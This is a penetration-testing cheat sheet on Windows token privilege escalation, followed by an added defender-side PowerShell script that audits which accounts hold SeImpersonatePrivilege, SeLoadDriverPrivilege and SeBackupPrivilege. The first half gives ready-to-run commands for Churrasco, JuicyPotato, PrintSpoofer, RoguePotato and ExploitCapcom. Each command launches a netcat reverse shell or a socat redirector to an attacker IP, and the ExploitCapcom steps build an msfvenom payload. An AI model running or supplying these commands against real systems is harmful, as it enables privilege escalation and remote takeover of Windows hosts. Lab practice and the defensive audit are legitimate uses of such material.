kashz-jewels
windows token exploits


Last updated 3 years ago


Churrasco

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Windows XP/VISTA/2003/2008, Win Server 2003

# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"

HotPotato

  • Windows 7,8,10, Server 2008, Server 2012

JuicyPotato

REQUIREMENTS:

  • SeImpersonatePrivilege

  • machine is older than Windows 10 1809 / Windows Server 2019

  • CLSID: can use the CLSID list or GetCLSID.ps1 linked under Clone Repo below (pick one valid for the target OS)

  • Try: {03ca98d6-ff5d-49b8-abc6-03dd84127020}

> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>

PrintSpoofer

REQUIREMENTS:

  • SeImpersonatePrivilege

  • Win10, Server 2016, Server 2019

> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run

RoguePotato

REQUIREMENTS:

  • SeImpersonatePrivilege

  • machine is Windows 10 1809 / Windows Server 2019 or newer

# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999

SeLoadDriverPrivilege

REQUIREMENTS:

  • Visual Studio to compile

Steps:

  1. obtain user SID

    1. Get-ADUser -Identity 'svc-print' | select SID

    2. (New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value

  2. Generate .exe msfvenom reverse shell

  3. Update path to reverse shell on target line 410 in file ExploitCapcom.cpp

  4. Set for RELEASE

  5. Build Solution

  6. run .\ExploitCapcom.exe

SeBackupPrivilege

Clone Repo: https://github.com/giuliano108/SeBackupPrivilege

Clone Repo / links for the other tools:

  • JuicyPotato

    • CLSID list: http://ohpe.it/juicy-potato/CLSID/

    • GetCLSID.ps1: http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1

  • PrintSpoofer

  • RoguePotato

  • SeLoadDriverPrivilege

  • tandasat/ExploitCapcom/
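Every tool on this page starts from the same two conditions: a token that holds SeImpersonatePrivilege (or SeLoadDriverPrivilege / SeBackupPrivilege for the last two sections) and an OS build on one side or the other of the Windows 10 1809 / Server 2019 line. The following is an added, defender-side example, not code from kashz-jewels or from any of the tool authors linked above: it audits a host for exactly those conditions, so an administrator can see which accounts hold the relevant rights before a compromised service account does. It assumes an elevated PowerShell 5.1+ session on the host being audited, that the local security policy export from `secedit.exe` is the source of truth (grants pushed by domain GPO show up only after policy has applied), and that build 17763 is the 1809 / Server 2019 boundary named in the RoguePotato and JuicyPotato requirements.

```powershell
# Added example (not from the kashz-jewels page): audit who holds the token
# privileges the tools above depend on, and where the host sits relative to
# the Windows 10 1809 / Server 2019 build boundary (build 17763).
# Assumptions: elevated PowerShell 5.1+, local policy exported via secedit.

$WatchedPrivileges = @(
    'SeImpersonatePrivilege',  # Churrasco, HotPotato, JuicyPotato, PrintSpoofer, RoguePotato
    'SeLoadDriverPrivilege',   # ExploitCapcom
    'SeBackupPrivilege'        # SeBackupPrivilege repo
)

function Get-PrivilegeAssignments {
    # Export the [Privilege Rights] section of the local policy and return a
    # hashtable: privilege name -> array of account names (raw SID when the
    # SID cannot be translated, e.g. an orphaned account).
    $inf = Join-Path $env:TEMP ("secpol-{0}.inf" -f [guid]::NewGuid())
    & secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
    if (-not (Test-Path $inf)) { throw "secedit export failed; run this from an elevated session." }
    try {
        $assignments = @{}
        $inSection = $false
        foreach ($line in Get-Content -Path $inf) {
            if ($line -match '^\[(.+)\]$') {
                $inSection = ($Matches[1] -eq 'Privilege Rights')
                continue
            }
            if (-not $inSection) { continue }
            if ($line -match '^\s*(Se\w+)\s*=\s*(.*)$') {
                $privilege = $Matches[1]
                $principals = foreach ($entry in ($Matches[2] -split ',')) {
                    $entry = $entry.Trim()
                    if ($entry -eq '') { continue }
                    if ($entry.StartsWith('*')) {
                        # secedit writes SIDs with a leading '*'; resolve them to account names
                        $sid = New-Object System.Security.Principal.SecurityIdentifier($entry.Substring(1))
                        try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $sid.Value }
                    } else {
                        $entry
                    }
                }
                $assignments[$privilege] = @($principals)
            }
        }
        return $assignments
    } finally {
        Remove-Item -Path $inf -Force -ErrorAction SilentlyContinue
    }
}

function Get-OsBuildBoundary {
    # Build 17763 is Windows 10 1809 / Windows Server 2019: the page's cut-off
    # between HotPotato/JuicyPotato hosts and PrintSpoofer/RoguePotato hosts.
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    $build = [int]$os.BuildNumber
    $era = if ($build -lt 17763) { 'older than Windows 10 1809 / Server 2019' } else { 'Windows 10 1809 / Server 2019 or newer' }
    [pscustomobject]@{ Caption = $os.Caption; Build = $build; Era = $era }
}

# Report: OS build bucket first, then the holders of each watched privilege.
$osInfo = Get-OsBuildBoundary
"{0} (build {1}): {2}" -f $osInfo.Caption, $osInfo.Build, $osInfo.Era

$assignments = Get-PrivilegeAssignments
foreach ($priv in $WatchedPrivileges) {
    $holders = if ($assignments.ContainsKey($priv)) { $assignments[$priv] -join ', ' } else { '(no explicit grant in local policy)' }
    "{0,-22} {1}" -f $priv, $holders
}
```

Read the output against the stock defaults: SeImpersonatePrivilege normally goes to Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE (plus IIS_IUSRS on web servers); SeBackupPrivilege to Administrators and Backup Operators; SeLoadDriverPrivilege to Administrators only. Any application or human account beyond those is a candidate to move into a dedicated service identity or virtual account, and any host still below build 17763 is in the window the HotPotato/JuicyPotato requirements describe.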